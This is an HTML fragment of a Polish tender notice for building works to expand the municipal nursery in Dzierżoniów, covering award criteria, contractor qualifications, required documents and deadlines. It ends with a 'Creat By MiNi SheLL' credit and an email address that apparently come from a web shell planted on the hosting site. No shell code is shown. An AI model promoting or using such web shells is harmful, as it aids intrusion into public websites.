</span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób wymienionych w katalogu określonym w art. 96 ust. 2 pkt 2 ustawy Pzp</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa następujące warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>a) w zakresie doświadczenia:<br/>wykonał należycie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, roboty budowlane w zakresie budowy lub/i przebudowy lub/i rozbudowy budynku użyteczności publicznej, o pow. użytkowej min. 130m2; wykazanie minimum 2 takich robót,<br/>b) w zakresie kwalifikacji zawodowych:<br/>skieruje do realizacji zamówienia następujące osoby, umożliwiające realizację zamówienia na odpowiednim poziomie<br/>jakości tj. w zakresie nadzoru nad realizacją robót budowlanych osoby posiadające uprawienia do kierowania robotami<br/>budowlanymi:<br/>- jedną osobę posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budolwanej (kierownik budowy) ,<br/>- jedną osobę posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,<br/>- jedną osobę posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>Przez uprawnienia do pełnienia samodzielnych funkcji w budownictwie zamawiający rozumie uprawnienia wydane na<br/>podstawie aktualnie obowiązującej ustawy – Prawo budowlane lub odpowiadające im ważne uprawnienia wydane na<br/>podstawie wcześniej obowiązujących przepisów albo odpowiednie kwalifikacje uzyskane za granicą, uznane w Polsce na<br/>podstawie przepisów o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej.<br/>Uwaga! W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>- warunek określony w pkt. a) musi być spełniony w całości przez co najmniej jednego z Wykonawców wspólnie<br/>ubiegających się o zamówienie (jeden lub każdy z podmiotów musi posiadać samodzielnie wymagane doświadczenie),<br/>- warunek określony w pkt. b) zostanie spełniony jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o<br/>zamówienie potwierdzi, iż spełnia ww. warunek albo Wykonawcy łącznie wykażą dysponowanie osobami. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy<br/>brak podstaw do wykluczenia z postępowania na podstawie przesłanek<br/>określonych w art. 108 ust. 1 ustawy Pzp (wzór stanowi załącznik nr 2 do SWZ). Zgodnie z art. 274 ust.<br/>1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnego na dzień<br/>złożenia,następującego podmiotowego środka dowodowego: Potwierdzenie aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w rozdziale IV ust. 1 pkt. 1.2 SWZ w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego - załącznik nr 8 do<br/>SWZ; (dokument ten składa każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia/podmiot udostępniający zasoby).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie<br/>z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty. Wzór wykazu robót budowlanych stanowi załącznik nr 6 do SWZ.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi Wykonawcami,<br/>wykaz, o którym mowa powyżej dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył;<br/>2) wykaz z osobami, skierowanymi przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnymi za kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia<br/>niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami. Wzór wykazu z osobami skierowanymi do realizacji zamówienia stanowi załącznik nr 7<br/>do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz Ofertowy stanowi załącznik nr 1 do SWZ. Wykonawca zobowiązany jest do wypełnienia Formularza<br/>Ofertowego na Platformie (informacje zawarte w SWZ) oraz opatrzenie go kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym przez osoby umocowane.2. Aktualne na dzień złożenia<br/>oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu (stanowi załącznik nr 2 do<br/>SWZ) w zakresie wskazanym w SWZ – każdy osobno spośród Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (dotyczy również wspólników spółki cywilnej) i podmiot trzeci, na którego potencjał powołuje się Wykonawca<br/>celem potwierdzenia spełnienia warunków udziału w postępowaniu. Oferta oraz oświadczenie o<br/>niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu muszą być<br/>złożone w oryginale. To samo dotyczy oświadczenia Wykonawcy o tym, że zachodzą wobec niego podstawy wykluczenia z<br/>postępowania na podstawie art. 108 ust. 1 pkt. 1, 2 ,5 ustawy Pzp.<br/>3. Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych,<br/>Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa<br/>obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy / należy złożyć<br/>dokument potwierdzający, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania - odpis lub<br/>informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru-Wykonawca nie jest zobowiązany do złożenia ww. dokumentów , jeżeli Zamawiający może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia Wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika.<br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak<br/>składana jest oferta (tj. w formie elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem<br/>osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia<br/>sporządzonego stosownie do art. 97 par 2 ustawy z dnia 14 lutego 1991 r. – Prawo o notariacie, które to poświadczenie<br/>notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym<br/>mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. 4. Oświadczenie<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia stanowi załącznik nr 5 do SWZ. 5. Zobowiązanie<br/>podmiotu trzeciego stanowi załącznik nr 4 do SWZ (o ile dotyczy). 6. W przypadku gdy Wykonawca powierza wykonanie<br/>części zamówienia podwykonawcy, zobowiązany jest do wykazania w załączniku nr 3 do SWZ informacji o części<br/>zamówienia, której wykonanie zamierza powierzyć podwykonawcom oraz podania nazw ich firm, o ile są już znane. 7.<br/>Zastrzeżenie tajemnicy przedsiębiorstwa – W przypadku informacji objętych tajemnicą przedsiębiorstwa Wykonawca powinien w momencie ich przekazania wyraźnie oznaczyć, które informacje stanowią tajemnicę przedsiębiorstwa oraz nie<br/>powinny być udostępniane. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego; b) Wszelka korespondencja<br/>będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem; c) Do oferty należy<br/>załączyć pełnomocnictwo dla ustanowionego pełnomocnika; d) Wykonawcy składają jedną<br/>ofertę, do której załączone będą dokumenty, o których mowa w SWZ; e) Wykonawca winien<br/>przedłożyć dokumenty i oświadczenia wymienione w rozdziale IV SWZ dotyczące każdego<br/>partnera konsorcjum osobno w zakresie tam wskazanym ; f) Oświadczenia i dokumenty<br/>wspólne, takie jak np.: oferta cenowa, składa pełnomocnik Wykonawców w imieniu wszystkich;<br/>g) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie; h) wszyscy partnerzy będą ponosić odpowiedzialność<br/>solidarną za wykonanie umowy zgodnie z jej postanowieniami; i) Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców,<br/>którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. Wtedy<br/>powinni dołączyć do oferty oświadczenie (załącznik nr 5 do SWZ), z którego wynika, które roboty<br/>budowlane wykonują poszczególni Wykonawcy, j) przed podpisaniem umowy Wykonawcy<br/>składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę<br/>konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmiany umowy zawartej z Wykonawcą. Wszystkie<br/>dopuszczalne zmiany postanowień umowy oraz określenie rodzaju, zakresu i warunków zmian<br/>zawarte są w § 19 wzoru umowy (stanowiącym załącznik nr 10 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem Platformy Zakupowej: https://dzierzoniow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-11 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-10</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść<br/>szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy Pzp, przysługują środki ochrony prawnej określone w dziale IX ustawy Pzp. Zamawiający wykluczy wykonawcę w<br/>przypadku zaistnienia okoliczności przewidzianych postanowieniami art. 7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego. Zamawiający zastrzega obowiązek osobistego wykonania przez<br/>Wykonawcę kluczowych zadań dotyczących zamówienia na roboty budowlane tj. Wykonawca wykona własnymi siłami roboty budowlane dotyczące branży konstrukcyjno-budowlanej obejmujące: ławy fundamentowe i ściany fundamentowe, ściany, wieńce, ścianki działowe, stropodach, słupy, podłogi i posadzki, sufity podwieszane, tynki, gładzie, licowanie ścian płytkami, roboty malarskie i elewacje. Pełna nazwa zamówienia: Wykonanie robót budowlanych związanych z realizacją zadania inwestycyjnego pn.: Rozbudowa i przebudowa budynku Żłobka Miejskiego w Dzierżoniowie w ramach programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 &#34;Maluch +&#34; 2022 - 2029&#34;.

Creat By MiNi SheLL
Email: jattceo@gmail.com